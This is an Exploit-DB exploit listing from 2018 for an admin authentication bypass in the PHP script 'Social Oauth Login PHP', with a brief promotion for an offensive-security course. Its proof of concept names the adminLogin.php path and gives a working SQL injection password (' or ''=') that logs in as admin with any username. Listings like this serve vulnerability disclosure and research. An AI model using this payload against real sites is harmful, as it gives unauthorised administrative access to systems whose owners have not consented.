Social Oauth Login PHP - Authentication Bypass

EDB-ID:

44036

CVE:

N/A


Author:

L0RD

Type:

webapps


Platform:

PHP

Date:

2018-02-14


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: Social Oauth Login PHP - Authentication Bypass
# Dork: N/A
# Date: 2018-02-12
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://www.codester.com/items/4554/social-oauth-login-php
# Version: All version
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# With this exploit,attacker can bypass admin login authentication.
# # # # #
# Proof of Concept :

http://localhost/PATH/adminLogin.php

# Username : anything
# Password : ' or ''='